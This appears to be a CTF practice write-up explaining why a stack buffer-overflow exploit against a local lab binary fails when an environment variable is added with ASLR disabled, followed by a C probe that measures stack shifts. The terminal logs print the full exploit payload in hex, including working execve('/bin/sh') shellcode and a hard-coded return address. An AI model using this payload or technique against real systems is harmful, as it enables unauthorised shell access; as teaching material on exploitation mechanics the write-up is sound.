# How environment variables shift stack addresses when ASLR is disabled


## Environment variables quietly interfering

```
~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  pwn  16:51:00
❯ python exp1.py  # first run of the exploit script
[+] Starting local process './level1' argv=[b'./level1'] : pid 116511
[DEBUG] Sent 0x90 bytes:
    00000000  31 c9 f7 e1  51 68 2f 2f  73 68 68 2f  62 69 6e 89  │1···│Qh//│shh/│bin·│
    00000010  e3 b0 0b cd  80 61 61 61  61 61 61 61  61 61 61 61  │····│·aaa│aaaa│aaaa│
    00000020  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000080  61 61 61 61  61 61 61 61  61 61 61 61  b0 d4 ff ff  │aaaa│aaaa│aaaa│····│
    00000090
[*] Switching to interactive mode
$ ls  # shell obtained, commands run normally
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x45 bytes:
    b'exp1.py level1 level1.c level2 pattern.py socat-2.0.0-b8.tar.gz\n'
exp1.py level1 level1.c level2 pattern.py socat-2.0.0-b8.tar.gz$
[*] Stopped process './level1' (pid 116511)

~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  5s  pwn  16:51:13
❯ set -x var 123  # add an environment variable var = 123

~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  pwn  16:51:27
❯ python exp1.py  # second run of the exploit script (after adding the environment variable)
[+] Starting local process './level1' argv=[b'./level1'] : pid 116661
[DEBUG] Sent 0x90 bytes:
    00000000  31 c9 f7 e1  51 68 2f 2f  73 68 68 2f  62 69 6e 89  │1···│Qh//│shh/│bin·│
    00000010  e3 b0 0b cd  80 61 61 61  61 61 61 61  61 61 61 61  │····│·aaa│aaaa│aaaa│
    00000020  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000080  61 61 61 61  61 61 61 61  61 61 61 61  b0 d4 ff ff  │aaaa│aaaa│aaaa│····│
    00000090
[*] Switching to interactive mode
[*] Got EOF while reading in interactive  # failed to get a shell
$ [*] Process './level1' stopped with exit code -11 (SIGSEGV) (pid 116661)

~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  3s  pwn  16:51:35
❯ set -e var  # remove the environment variable var again

~/CTF/problem/pwn/ROP-zhengmi/ROP_STEP_BY_STEP/linux_x86  pwn  16:51:50
❯ python exp1.py  # third run of the exploit script
[+] Starting local process './level1' argv=[b'./level1'] : pid 116805
[DEBUG] Sent 0x90 bytes:
    00000000  31 c9 f7 e1  51 68 2f 2f  73 68 68 2f  62 69 6e 89  │1···│Qh//│shh/│bin·│
    00000010  e3 b0 0b cd  80 61 61 61  61 61 61 61  61 61 61 61  │····│·aaa│aaaa│aaaa│
    00000020  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  │aaaa│aaaa│aaaa│aaaa│
    *
    00000080  61 61 61 61  61 61 61 61  61 61 61 61  b0 d4 ff ff  │aaaa│aaaa│aaaa│····│
    00000090
[*] Switching to interactive mode
$ ls  # shell obtained again, commands run normally
[DEBUG] Sent 0x3 bytes:
    b'ls\n'
[DEBUG] Received 0x45 bytes:
    b'exp1.py level1 level1.c level2 pattern.py socat-2.0.0-b8.tar.gz\n'
exp1.py level1 level1.c level2 pattern.py socat-2.0.0-b8.tar.gz
```
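The payload above ends in a fixed stack address (`b0 d4 ff ff`, i.e. 0xffffd4b0), and the second run fails because the kernel places the environment strings at the top of the initial stack, so every extra `KEY=VALUE` pushes all later frames down. The following added probe (not code from the original post) prints where a local buffer lands and how many bytes a given environment occupies; it models only the strings plus their pointer array and treats loader alignment padding as out of scope (an assumption), so the reported growth is an estimate.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bytes the environment takes on the initial stack: every "KEY=VALUE"
 * string with its NUL, plus one pointer slot per entry and the NULL
 * terminator of the envp array. Alignment padding is not modelled. */
size_t env_block_bytes(char *const envp[], size_t ptr_size) {
    size_t strings = 0, count = 0;
    for (; envp[count] != NULL; count++)
        strings += strlen(envp[count]) + 1;
    return strings + (count + 1) * ptr_size;
}

/* Extra bytes one added variable costs, e.g. "var=123" from the post:
 * 3 + 1 + 3 + 1 bytes of string plus one pointer slot. */
size_t env_growth_for(const char *key, const char *value, size_t ptr_size) {
    return strlen(key) + 1 + strlen(value) + 1 + ptr_size;
}

/* Address of a local buffer in a fresh frame, returned as an integer so
 * two runs can be compared. A hard-coded return address like 0xffffd4b0
 * is only valid if this value is identical on every run. */
uintptr_t stack_probe_address(void) {
    volatile char buf[64];
    buf[0] = 0;                       /* keep the buffer in the frame */
    volatile uintptr_t addr = (uintptr_t)buf;
    return addr;
}

int main(int argc, char **argv, char **envp) {
    size_t n = 0;
    (void)argc; (void)argv;
    while (envp[n] != NULL)
        n++;
    printf("environment: %zu entries, about %zu bytes on the initial stack\n",
           n, env_block_bytes(envp, sizeof(void *)));
    printf("local buffer at %#lx\n", (unsigned long)stack_probe_address());
    printf("adding var=123 would grow the environment by about %zu bytes\n",
           env_growth_for("var", "123", sizeof(void *)));
    return 0;
}
```

Build it with `gcc -m32 -o probe probe.c` (or without `-m32` for a 64-bit view) and compare `env -i setarch -R ./probe` against `env -i var=123 setarch -R ./probe`: with ASLR disabled by `setarch -R` the buffer address is stable between identical runs and moves down as soon as the environment grows.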